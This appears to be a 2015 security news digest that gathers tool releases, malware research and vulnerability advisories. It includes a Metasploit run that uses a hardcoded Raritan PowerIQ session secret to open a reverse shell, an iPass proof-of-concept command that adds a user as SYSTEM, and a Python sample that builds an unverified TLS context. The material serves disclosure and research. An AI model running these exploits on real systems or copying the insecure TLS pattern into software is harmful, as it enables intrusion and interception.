Channel: BOT24

Capstone disassembly framework 3.0.2 is out!

We are happy to announce the stable version 3.0.2 of the Capstone disassembly framework!

The source code is available in zip and tar.gz formats, or at tagname 3.0.2 in our Github repo.

more here...........http://capstone-engine.org/Version-3.0.2.html

Inverted WordPress Trojan

A trojan (or trojan horse) is software that does (or pretends to do) something useful but also contains a secret malicious payload that inconspicuously does something bad. In WordPress, typical trojans are plugins and themes (usually pirated) which may contain backdoors, send out spam, create doorways, or inject hidden links or malware. The trojan model is easy to understand: package malware inside something useful and have webmasters install it themselves.

This week I came across something that I can call an inverted trojan — malware (installed without webmaster consent) that added useful features to WordPress.

This is a typical black hat SEO hack that has affected lots of WordPress sites lately. It creates doorways for pharmaceutical keywords and redirects visitors that come from search engines to third-party sites. But the way the doorway code works is quite interesting.

more here.......http://blog.sucuri.net/2015/03/inverted-wordpress-trojan.html

Raritan PowerIQ known session secret

Raritan PowerIQ versions 4.1, 4.2, and 4.3 ship with a Rails 2 web interface with a hardcoded session secret of 8e238c9702412d475a4c44b7726a0537.

This can be used to achieve unauthenticated remote code execution as the nginx user on vulnerable systems.

msf exploit(rails_secret_deserialization) > show options

Module options (exploit/multi/http/rails_secret_deserialization):

   Name             Current Setting                           Required  Description
   ----             ---------------                           --------  -----------
   COOKIE_NAME                                                no        The name of the session cookie
   DIGEST_NAME      SHA1                                      yes       The digest type used to HMAC the session cookie
   HTTP_METHOD      GET                                       yes       The HTTP request method (GET, POST, PUT typically work)
   Proxies                                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RAILSVERSION     3                                         yes       The target Rails Version (use 3 for Rails3 and 2, 4 for Rails4)
   RHOST            192.168.0.20                              yes       The target address
   RPORT            443                                       yes       The target port
   SALTENC          BAh7CUkiCXNrZXkGOgZFRkkiFTgzMzVmNDY2ZDdmOTI2Y2IGOwBUSSINbGljZW5zZWQGOwBGVEkiD3Nlc3Npb25faWQGOwBUSSIlNGJlNzA2Nzk2NWFjYjFmNzU2ZThiY2IyNGVkNWM0MDMGOwBUSSIOcmV0dXJuX3RvBjsARiIGLw==  yes       The encrypted cookie salt
   SALTSIG          42df31d8a91b45e5ad3e9f3213dc5d6859df1cf8  yes       The signed encrypted cookie salt
   SECRET           8e238c9702412d475a4c44b7726a0537          yes       The secret_token (Rails3) or secret_key_base (Rails4) of the application (needed to sign the cookie)
   TARGETURI        /login/login                              yes       The path to a vulnerable Ruby on Rails application
   VALIDATE_COOKIE  true                                      no        Only send the payload if the session cookie is validated
   VHOST                                                      no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(rails_secret_deserialization) > exploit

[*] Started reverse handler on 192.168.0.19:4444
[*] Checking for cookie
[*] Adjusting cookie name to _session_id
[+] SECRET matches! Sending exploit payload
[*] Sending cookie _session_id
[*] Command shell session 1 opened (192.168.0.19:4444 -> 192.168.0.20:43729) at 2015-03-11 19:45:20 -0500

id
uid=498(nginx) gid=498(nginx) groups=498(nginx),100(users)


Authored by Brandon Perry

Introducing dnsdist: DNS, abuse- and DoS-aware query distribution for optimal performance

Over the years, PowerDNS users have frequently asked us about our preferred DNS load balancing solution, and we’ve never had a satisfying answer for that. Users of dedicated hardware often tell us that vendors spend most of their time and effort on balancing HTTP, and frequently deliver substandard or even buggy DNS functionality.

In terms of software, one big PowerDNS deployment is happy with OpenBSD relayd, and it indeed does look powerful. Other operators have deployed keepalived, which is very strong from a networking standpoint, but does not offer a lot of DNS specifics.

But all in all, we never found any load balancing solution for DNS that made people truly happy.

more here..........http://blog.powerdns.com/2015/03/11/introducing-dnsdist-dns-abuse-and-dos-aware-query-distribution-for-optimal-performance/

Defending Against PoS RAM Scrapers

Stealing payment card data has become an everyday crime that yields quick monetary gains. Attackers aim to steal the data stored in the magnetic stripe of payment cards, optionally clone the cards, and run charges on the accounts associated with them. The topic of PoS RAM scraper malware always prompts businesses and retailers to ask two important questions: “How do I protect myself?” and “What new technologies are vendors introducing to protect businesses and consumers?”

This blog entry seeks to answer these questions by discussing a PoS Defense Model and new technologies that can protect businesses and consumers from PoS RAM attacks.

more here..........http://blog.trendmicro.com/trendlabs-security-intelligence/

Hijacking SSH to Inject Port Forwards

During red team post exploitation I sometimes run into jump boxes leading to test environments, production servers, DMZs, or other organizational branches. As these systems are designed to act as couriers of outbound traffic, hijacking SSH sessions belonging to other users can be useful. So what do you do when you have full control over a jump box and want to leverage another user's outbound SSH access to tunnel into another segment? What if you don't have passwords, keys, shouldn't drop binaries, and SSH is protected by 2-factor authentication? Roll up your sleeves and trust your command line Kung Fu!

This post will cover two approaches to hijacking SSH sessions, without credentials, with the goal of inserting dynamic port forwards on the fly. The two stages at which I'll approach hijacking sessions are: (1) upon session creation, and (2) when a live SSH session exists inside of screen (more common than you'd think). In each case our final goal is to create a tunnel inside another user's active session in order to gain access to outbound routes on the terminating SSHD host.

more here..........http://0xthem.blogspot.co.uk/2015/03/hijacking-ssh-to-inject-port-forwards.html

ARMPwn

Repository to train/learn memory corruption on the ARM platform. here....https://github.com/saelo/armpwn

Windows Event Log Driven Back Doors

Well it's about time to get that white hat a little dirty.

None of these are original ideas; I've heard of this being done in theory, as in "oh, you know what would make a good persistence idea?", but I've never actually seen anything implement it. So I decided to do that.
*EDIT In fact this is exactly where I saw it first. SANS Wipe the HardDrive written by Mark Baggett and inspired by Jake Williams.

Let us take this from the metaphysical to the physical here.......http://blakhal0.blogspot.gr/2015/03/windows-event-log-driven-back-doors.html

'Locked Out'

The evolution of encrypters and user errors here........https://securelist.com/analysis/publications/68960/locked-out/

CYCLICAL REDUNDANCY CHECK – AN EXPLANATION FOR THE LAYMAN

During a recent audit, I ran into something interesting while reviewing a script as part of a control related to data integrity. The script performed a simple ETL function (Extract Transform & Load) on tables of data sent and retrieved over a secure FTP connection from their customer’s server.

As I wallowed in geek heaven, deconstructing the code and the intricacies of their ETL process, I ran into a really groovy algorithm. I asked the author of the script what the algorithm was for and he said it performed a Cyclical Redundancy Check (CRC).

I remembered reading up on CRC checks while studying for the CISA, but had never encountered one in the wild. I figured now is a better time than any to dive in and learn more!

more here.......http://www.risk3sixty.com/2015/03/12/cyclical-redundancy-check-an-explanation-for-the-layman/

QEMU + GDB + PE IMPORTS

QEMU implements a GDB server, making it possible to attach to the operating system from outside the virtual machine via the target remote command of the debugger. When analysing Windows malware, this method is useful to bypass any anti-debug technique, but it has a big drawback: GDB has no knowledge of the underlying system and therefore cannot display any symbols to ease the analysis. As an example, let's see how to add information from the import table here......http://www.lexsi-leblog.com/cert-en/qemu-gdb-pe-imports.html

Who got the bad SSL Certificate? Using tshark to analyze the SSL handshake.

Ever wonder if any of your users connect to sites with bad SSL certificates? I ran into this issue recently when debugging some SSL issues, and ended up with this quick tshark and shell script trick to extract the necessary information from a packet capture here......https://isc.sans.edu/forums/diary/Who+got+the+bad+SSL+Certificate+Using+tshark+to+analyze+the+SSL+handshake/19455/

VBA Maldoc: We Don’t Want No Stinkin Sandbox/Virtual PC

Today I got an interesting maldoc sample (77f3949c2130b268bb18061bcb483d16): it will not activate if it runs in a sandboxed or virtualized environment.

The following statements are executed right before the malicious actions begin here....http://blog.didierstevens.com/2015/03/11/vba-maldoc-we-dont-want-no-stinkin-sandboxvirtual-pc/

New Facebook Worm Variant Leverages Multiple Cloud Services

Social networks are particularly interesting for malware authors because they can be leveraged to spread an infection starting with a single person.

Patient zero can transmit the piece of malware to all of his contacts which in turn do the same, quickly becoming viral and affecting hundreds of thousands of people.

We came across a worm that we think belongs to the Kilim family and whose purpose is to compromise a user and spread via Facebook.

more here........https://blog.malwarebytes.org/fraud-scam/2015/03/new-facebook-worm-variant-leverages-multiple-cloud-services/

Python's Restkit HTTP resource kit does not validate TLS, which means its HTTPS handling is broken and insecure

Python's Restkit[1][2][3][4] does not properly validate TLS
(see https://github.com/benoitc/restkit/issues/140). It appears to simply use
ssl.wrap_socket from the standard library, which does not do any certificate
validation by default. This can be verified by doing:

>>> from restkit import request
>>> r = request("https://tv.eurosport.com/")
>>> r.body_string()
'<HTML><HEAD>...'



[1] https://github.com/benoitc/restkit
[2] https://pypi.python.org/pypi/restkit
[3] http://restkit.readthedocs.org/en/latest/
[4] https://benoitc.github.io/restkit/index.html

---
Authored by Donald Stufft
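The report above comes down to one stdlib detail: a client socket wrapped with ssl.wrap_socket() defaults to verify_mode CERT_NONE and performs no hostname check, so any certificate is accepted. The following added example (my own code, not restkit's and not part of the original post) reproduces those defaults with an SSLContext, puts the hardened stdlib equivalent beside it, and includes a small audit helper that reports the two weaknesses a reviewer would flag in any such context. The function names and the audit messages are my own choices; connect_tls() and https_get() need network access and are only there to show how server_hostname ties the certificate check to the requested host.

```python
"""Insecure-by-default versus verified TLS client contexts in the Python stdlib.

Added example, not restkit's code. restkit wrapped sockets with
ssl.wrap_socket() without asking for verification; the first context below
mirrors those defaults so the difference is visible side by side.
"""
import socket
import ssl
from typing import List, Optional


def legacy_wrap_style_context() -> ssl.SSLContext:
    """Reproduce what ssl.wrap_socket() gave a caller that set nothing:
    no certificate verification and no hostname check. Shown only for
    comparison; never use this for real traffic."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    # check_hostname must be switched off before verify_mode can be CERT_NONE
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hardened_context(cafile: Optional[str] = None) -> ssl.SSLContext:
    """Verify the server chain against a trust store and check the hostname.
    cafile=None means the platform's default CA bundle."""
    ctx = ssl.create_default_context(cafile=cafile)
    # Already the defaults of create_default_context(); restated so a later
    # edit cannot weaken them without the change being obvious in review.
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx


def audit_context(ctx: ssl.SSLContext) -> List[str]:
    """Return the validation problems a code reviewer should flag (empty if none)."""
    problems = []
    if ctx.verify_mode == ssl.CERT_NONE:
        problems.append("verify_mode is CERT_NONE: any certificate is accepted")
    if not ctx.check_hostname:
        problems.append("check_hostname is off: a valid certificate for another host is accepted")
    return problems


def connect_tls(host: str, port: int = 443, *,
                ctx: Optional[ssl.SSLContext] = None,
                timeout: float = 5.0) -> ssl.SSLSocket:
    """Open a TLS connection. server_hostname supplies SNI and is the name the
    certificate is checked against; omitting it is itself a verification bug."""
    ctx = ctx or hardened_context()
    raw = socket.create_connection((host, port), timeout=timeout)
    return ctx.wrap_socket(raw, server_hostname=host)


def https_get(host: str, path: str = "/", *,
              ctx: Optional[ssl.SSLContext] = None) -> bytes:
    """Minimal GET over a verified connection; raises ssl.SSLCertVerificationError
    (a subclass of ssl.SSLError) instead of silently accepting a bad certificate."""
    with connect_tls(host, ctx=ctx) as tls:
        request = f"GET {path} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"
        tls.sendall(request.encode("ascii"))
        chunks = []
        while True:
            chunk = tls.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


if __name__ == "__main__":
    print("legacy:  ", audit_context(legacy_wrap_style_context()))
    print("hardened:", audit_context(hardened_context()))
```

The audit helper is the part worth keeping around: run it against whatever context a library hands you before trusting an HTTPS client, since a verify_mode of CERT_NONE is exactly the condition the restkit issue describes.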

Paper: Control Flow Graph Based Attacks

This report addresses de-obfuscation of programs. The targeted obfuscation scheme is control flow flattening, an obfuscation method focused on hiding the control flow of a program. This scheme introduces a special block named the dispatcher into the program, and the control flow is reconstructed so that execution is directed back to the dispatcher whenever a basic block ends. As a result, in the flattened program each basic block could be recognized as a predecessor or a successor of any other basic block, and the real control flow of the program is disclosed only during its execution.

This report aims to remove the dispatcher added to the flattened program and rebuild the control flow of the original program. To achieve this, the report presents a de-obfuscation model based on the Control Flow Graph of an obfuscated program. The de-flattening model makes use of both static analysis and dynamic analysis.

more here...........http://www.diva-portal.org/smash/get/diva2:762870/FULLTEXT01.pdf

How secure are you online? The Cyber Security Month Security test!

Welcome to the Network and Information Security quiz!
This tool is designed to help you update your internet security knowledge; begin whenever you feel ready. It will take at most 10 minutes here..........http://cybersecuritymonth.eu/references/quiz-demonstration

tcpdump Version: 4.7.3 / 1.7.2 is latest release

A powerful command-line packet analyzer; and libpcap, a portable C/C++ library for network traffic capture here..........http://www.tcpdump.org/#latest-release

MSA-2015-03: iPass Mobile Client Service Local Privilege Escalation

Mogwai Security Advisory MSA-2015-03
----------------------------------------------------------------------
Title:              iPass Mobile Client service local privilege escalation
Product:            iPass Mobile Client
Affected versions:  iPass Mobile Client 2.4.2.15122 (newer versions might also be affected)
Impact:             medium
Remote:             no
Product link:       http://www.ipass.com/laptops/
Reported:           11/03/2015
by:                 Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)


Vendor's Description of the Software:
----------------------------------------------------------------------
The iPass Open Mobile client for laptops is lightweight and always on.
It provides easy, seamless connectivity across iPass, customer, and third-party
networks, and allows you to mix and match carrier networks without disrupting
your users.

The iPass Open Mobile client for laptops allows organizations to provide granular
options for how employees connect to iPass Wi-Fi (the iPass Mobile Network),
campus Wi-Fi, mobile broadband (3G/4G), Ethernet, and dial, using a single
platform to manage all connections. Open Mobile also enables cost and security
controls that provide virtual private network (VPN) integration options; mobile
broadband 3G/4G usage controls for both data roaming and data usage; endpoint
integrity verification that checks the security of the device at the point of
connection; and several additional options for setting network connection and
restriction policies. Insight into an organization's mobility usage is provided
through user and device activity and summary reports as well as mobile broadband
usage reports.
-----------------------------------------------------------------------

Vendor response:
-----------------------------------------------------------------------
"We do not consider this a vulnerability as it is how the product was designed"

Business recommendation:
-----------------------------------------------------------------------
Disable the iPass service unless really required


-- CVSS2 Ratings ------------------------------------------------------

CVSS Base Score: 5.6
Impact Subscore: 7.8
Exploitability Subscore: 3.9
CVSS v2 Vector (AV:L/AC:L/Au:N/C:P/I:C/A:N)
-----------------------------------------------------------------------


Vulnerability description:
----------------------------------------------------------------------
The iPass Open Mobile Windows Client utilizes named pipes for interprocess
communication. One of these pipes accepts/forwards commands to the iPass
plugin subsystem.

A normal user can communicate with this pipe through the command line client
EPCmd.exe which is part of the iPass suite. A list of available commands can
be displayed via "System.ListAllCommands".

The iPass pipe provides an "iPass.EventsAction.LaunchAppSysMode" command which
allows arbitrary commands to be executed as SYSTEM. This can be abused by a
normal user to escalate his local privileges.

Please note that this issue can also be exploited remotely in version
2.4.2.15122, as the named pipe can also be reached via SMB. However, according
to our information, the pipe is no longer remotely accessible in current
versions of the iPass Mobile client.


Proof of concept:
----------------------------------------------------------------------

The following EPCmd command line creates a local user "mogwai" with password
"mogwai":

EPCmd.exe iPass.EventsAction.LaunchAppSysMode c:\windows\system32\cmd.exe;"/c
net user mogwai mogwai /ADD;;

Disclosure timeline:
----------------------------------------------------------------------
10/03/2015: Requesting security contact from iPass sales
10/03/2015: Sales responded, will forward vulnerability information to development
11/03/2015: Sending vulnerability details
11/03/2015: iPass asks which customer we represent
11/03/2015: Responding that we don't represent any iPass customer
12/03/2015: iPass responded, won't fix, says that the product works as designed


Advisory URL:
----------------------------------------------------------------------
https://www.mogwaisecurity.de/#lab


----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Steinhoevelstrasse 2/2
89075 Ulm (Germany)

info@mogwaisecurity.de

Compromised Root Cause Analysis Model Revisited

How? The one question that is easy to ask but can be very difficult to answer. It's the question I kept asking myself over and over, reading article after article where publicized breaches and compromises were discussed. Each article alluded to the answer about how the breach or compromise occurred in the first place, but each one left something out. Every single one left out the details that influenced their conclusions. As a result, I was left wondering how they figured out how the attack occurred in the first place. It was the question everyone alluded to, and everyone said to perform root cause analysis to determine the answer. They didn't elaborate on how to actually do root cause analysis, though. Most incident response literature echoes the same sentiment: do root cause analysis, while omitting the most critical piece, explaining how to do it. I asked my question to a supposed "incident responder" and their response was along the lines of "you will know it when you see it." Their answer, along with every other answer on the topic, was not good enough. What was needed was a repeatable, methodical process one can use to perform root cause analysis. The type of methodical process found in the Compromise Root Cause Analysis Model.


more here...........http://journeyintoir.blogspot.com/2015/03/compromised-root-cause-analysis-model.html